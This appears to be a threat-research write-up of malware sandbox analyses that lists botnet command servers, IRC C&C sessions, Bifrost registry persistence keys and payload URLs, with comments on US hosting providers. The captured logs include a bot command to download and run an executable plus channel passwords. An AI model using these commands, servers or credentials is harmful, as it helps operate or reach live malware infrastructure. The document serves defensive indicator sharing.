DNS Lookup
Host Name  IP Address
medogrgr.no-ip.biz  188.49.5.146
Outgoing connection to remote server: medogrgr.no-ip.biz TCP port 81
Registry Changes by all processes
Create or Open Changes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9D71D88C-C598-4935-C5D1-43AA4DB90836} "stubpath" = [REG_EXPAND_SZ, value: C:\WINDOWS\Bifrost\server.exe s]
HKEY_LOCAL_MACHINE\SOFTWARE\Bifrost "nck" = [REG_BINARY, size: 16 bytes]
HKEY_CURRENT_USER\Software\Bifrost "klg" = [REG_BINARY, size: 1 bytes]
Reads
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Advanced INF Setup "AdvpackLogFile"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal
98.126.44.98 (Botnet hosted with kryptservers.com, USA, California)
Still US hosting involved in botnet hosting.
Remote Host  Port Number
208.53.183.219  80
208.53.183.73  80
208.53.183.92  80
98.126.44.98  8100
PASS laorosr
ircd here
MODE #! -ix
MODE #Ma -ix
USER SP2-650 * 0 :COMPUTERNAME
MODE [N00_USA_XP_9718720] @ -ix
MODE #dpi -ix
Joins channel: :#! #! :.asc-S|.http http://208.53.183.217/use13.exe|.asc exp_all 30 5 0 -a-r -e|.asc exp_all 30
bss-crypt.no-ip.info
Processes Created
PId  Process Name  Image Name
0x378  cc.exe  C:\WINDOWS\cc.exe
Threads Created
PId  Process Name  TId  Start  Start Mem  Win32 Start  Win32 Start Mem
0x2ac  lsass.exe  0x298  0x7c810856  MEM_IMAGE  0x77e76bf0  MEM_IMAGE
0x348  svchost.exe  0xf8  0x7c810856  MEM_IMAGE  0x7c910760  MEM_IMAGE
0x378  cc.exe  0x374  0x7c810867  MEM_IMAGE  0x4973f0  MEM_IMAGE
0x3f4  svchost.exe  0x67c  0x7c810856  MEM_IMAGE  0x77e76bf0  MEM_IMAGE
DNS Queries
DNS Query Text
bss-crypt.no-ip.info
ms.allnewdots.com (Butterfly bot hosted in United States, Woodstock, Fdcservers.net)
Yes, again this hoster, and again a Butterfly bot hosted in the USA; they probably don't know that the Butterfly botnet creator was arrested by the FBI.
IP Location: United States Woodstock Fdcservers.net
Resolve Host: sys-047.leeware.com
IP Address: 208.53.131.135
exe file hosted with fdcservers.net: http://74.63.78.13/bdnu.exe
IP Location: United States Woodstock Fdcservers.net
Resolve Host: roa.ecuaideas3.net
IP Address: 74.63.78.13
Resolved
gutyeaz.com
DNS Lookup
Host Name  IP Address
dell-d3e62f7e26  10.1.6.2
gutyeaz.com  184.106.247.215
kadds.ru  91.211.117.127
rapidshare.com  195.122.131.4
rs286l34.rapidshare.com  62.67.1.87
UDP Connections
Remote IP Address: 184.106.247.215 Port: 2727
Send Datagram: packet(s) of size 21
Recv Datagram: 3000 packet(s) of size 0
Remote IP Address: 184.106.247.215 Port: 2727
Send Datagram: packet(s) of size 21
Recv Datagram: 3000 packet(s)
limon4ik.com (E-mail worm hosted with http://www.interserver.net/, US hosting)
DNS Lookup
Host Name  IP Address
ssl.aukro.ua  193.23.48.228
ir.kagoshima-u.ac.jp  163.209.180.1
ss1.coressl.jp  202.172.28.253
www.billboxrecords.com.br  200.234.192.141
www.saredrogarias.com.br  74.52.66.226
forum.gryada.org.ua  193.169.188.64
loja.tray.com.br  201.20.35.20
masterkey.com.ua  212.82.216.42
isu2.tup.km.ua  212.111.198.59
www.stone.co.ua  67.15.97.220
www.mlh.co.jp  115.125.150.234
sou
wow.merlin.org.ua  91.203.146.30
global-host.com.ua
ex2.broadser
form.cao.go.jp  203.180.136.89
bunker.org.ua  195.214.214.53
UDP Connections
Remote IP Address: 10.1.1.1 Port: 53
Send Datagram: 2 packet(s) of size 37
Recv Datagram: packet(s)
ihax.sytes.net (CableLink109-243.telefonia.InterCable.net, Mexico)
ihax.sytes.net: type A, class IN, addr 201.172.109.243
api.ipinfodb.com: type A, class IN, addr 67.212.74.82
Data: GET /v2/ip_query_country.php?key=86c9c734428c1230cba1356dcf99dc882bc229bf93fbd6491db4e8776d6d9a88&timezone=off HTTP/1.1
Raw:
GET /v2/ip_query_country.php?key=86c9c734428c1230cba1356dcf99dc882bc229bf93fbd6491db4e8776d6d9a88&timezone=off HTTP/1.1
Host: api.ipinfodb.com
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1) Gecko/20090612 Firefox/3.5
Connection: closed
91.203.146.65 (Botnet hosted with http://goodnet.com.ua/, Ukraine)
Remote Host  Port Number
173.193.205.116  8014
69.163.248.145  80
69.163.250.145  80
69.50.197.244  80
89.238.149.67  80
92.241.184.111  80
91.203.146.65  8878 (port changed to 7276)
USER duzlurcv duzlurcv duzlurcv :ajpenurz
NICK ROIKiQGLO
PONG :lols.nope.com
MODE ROIKiQGLO +xi
JOIN #maxi
USERHOST ROIKiQGLO
MODE #maxi +smntu
Now talking in #maxi
Topic On: [ #maxi ] [ =IxgN+TVR/M3693AU+b3Zymnqh7XjJ1xl8jRu0jdcrmWRb9Cr2BZAVxeyjwZ5PinlmrfYQ071m7u5f6tl0MGpVffGThs1UcXWLPEB2izDaRPHN8sxZILY/zc1b9ShwEHRBfKIZHRzdVWFQLUQ74SpuICbyIMK9U9yfLFnFvRV2Q1ry1d9NFrF1qzxS1kgf9/MG+tReUpUCS70eGoaIVQBELe+h1jgUQOlu6bKkas6aD8ro4e/ZSuWsr90pUDny6j8vHGNx99a/dFEw/gHLDmso9qbVB ]
Topic By:
64.202.120.41 (botnet hosted with hostforweb.com)
Another botnet server hosted in the US (Chicago) via www.hostforweb.com.
Remote Host  Port Number
204.0.5.42  80
204.0.5.43  80
204.0.5.58  80
208.43.117.134  80
216.178.38.103  80
216.178.38.168  80
63.135.86.30  80
63.135.86.37  80
64.208.138.101  80
66.220.149.25  80
64.202.120.41  1234
PASS xxx
ircd here
NICK NEW-[USA|00|P|09511]
USER XP-8613 * 0 :COMPUTERNAME
MODE NEW-[USA|00|P|09511] -ix
JOIN #!nn! test
PONG 22
MOTD
bbg.moiservice.com
DNS Lookup
Host Name  IP Address
bbg.moiservice.com  74.117.174.82
i3ED6DA76.versanet.de  62.214.218.118
Opened listening TCP connection on port: 55907
Opened listening TCP connection on port: 113
C&C Server: 74.117.174.82:16667
Server Password:
Username: laMer
Nickname: XP|Ubd2
Channel: #lbl# (Password: lam)
Channeltopic: :
Registry Changes by all processes
Create or Open Changes
HKEY_CURRENT_USER\Software\mIRC "DateUsed" = 1264705554
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mIRC "DisplayName" =